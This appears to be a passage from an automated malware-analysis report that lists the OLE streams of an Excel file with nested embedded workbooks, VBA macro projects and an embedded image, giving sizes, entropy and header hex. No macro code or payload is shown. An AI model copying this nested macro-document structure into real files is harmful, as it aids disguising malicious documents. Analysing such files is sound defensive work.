          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.889430592781307
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:200
          Entropy:3.3020681057018666
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . D P . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
          General
          Stream Path:MBD0191BFB6/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB6/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:12479
          Entropy:7.0945112382968425
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a7 95 f9 99 84 01 00 00 14 06 00 00 13 00 dd 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d9 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB7/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB7/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:37036
          Entropy:7.720975169587741
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.701136490257069
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
          General
          Stream Path:MBD0191BFB8/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:220
          Entropy:3.372234242231489
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD0191BFB8/MBD0018D4CE/\x1Ole
          CLSID:
          File Type:data
          Stream Size:20
          Entropy:0.5689955935892812
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . .
          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD0018D4CE/\x3ObjInfo
          CLSID:
          File Type:data
          Stream Size:4
          Entropy:0.8112781244591328
          Base64 Encoded:False
          Data ASCII:. . . .
          Data Raw:00 00 03 00
          General
          Stream Path:MBD0191BFB8/MBD0018D4CE/Contents
          CLSID:
          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
          Stream Size:197671
          Entropy:6.989042939766534
          Base64 Encoded:True
          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD0068D442/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD0068D442/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26243
          Entropy:7.635433729726103
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:248
          Entropy:3.0523231150355867
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:256
          Entropy:4.086306928392587
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:134792
          Entropy:7.974168320310173
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:468
          Entropy:5.269289820125323
          Base64 Encoded:True
          Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
          Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:83
          Entropy:3.0672749060249043
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:2486
          Entropy:3.9244127831265385
          Base64 Encoded:False
          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
          General
          Stream Path:MBD0191BFB8/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
          CLSID:
          File Type:data
          Stream Size:536
          Entropy:6.330646364694152
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
          Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
          General
          Stream Path:MBD0191BFB8/MBD00726B69/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/MBD00726B69/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26242
          Entropy:7.635424485665502
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB8/Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:283872
          Entropy:7.743278150467805
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
          General
          Stream Path:MBD0191BFB9/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB9/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:45934
          Entropy:7.5587990853484195
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFBA/\x1Ole
